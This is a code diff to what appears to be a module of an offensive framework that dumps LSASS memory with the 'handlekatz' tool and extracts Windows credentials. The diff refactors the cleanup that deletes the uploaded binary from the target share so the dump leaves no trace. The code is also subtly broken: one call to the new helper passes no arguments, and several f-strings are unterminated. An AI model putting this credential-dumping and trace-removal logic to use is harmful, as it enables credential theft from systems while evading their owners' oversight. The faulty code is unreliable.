@@ -78,6 +78,7 @@ def on_admin_login(self, context, connection):
7878
7979 if not p or p == "None" :
8080 context .log .fail ("Failed to execute command to get LSASS PID" )
81+ self .delete_handlekatz_binary (connection , context )
8182 return
8283 # we get a CSV string back from `tasklist`, so we grab the PID from it
8384 pid = p .split ("," )[1 ][1 :- 1 ]
@@ -113,11 +114,7 @@ def on_admin_login(self, context, connection):
113114 except Exception as e :
114115 context .log .fail (f"Error while get file: { e } )
115116
116- try :
117- connection .conn .deleteFile (self .share , self .tmp_share + self .handlekatz )
118- context .log .success (f"Deleted handlekatz file on the { self .share } )
119- except Exception as e :
120- context .log .fail (f"[OPSEC] Error deleting handlekatz file on share { self .share } { e } )
117+ self .delete_handlekatz_binary ()
121118
122119 try :
123120 connection .conn .deleteFile (self .share , self .tmp_share + machine_name )
@@ -182,3 +179,13 @@ def on_admin_login(self, context, connection):
182179 add_user_bh (credz_bh , None , context .log , connection .config )
183180 except Exception as e :
184181 context .log .fail (f"Error opening dump file: { e } )
182+
183+ else :
184+ self .delete_handlekatz_binary (connection , context )
185+
186+ def delete_handlekatz_binary (self , connection , context ):
187+ try :
188+ connection .conn .deleteFile (self .share , self .tmp_share + self .handlekatz )
189+ context .log .success (f"Deleted handlekatz file on the { self .share } )
190+ except Exception as e :
191+ context .log .fail (f"[OPSEC] Error deleting handlekatz file on share { self .share } { e } )
0 commit comments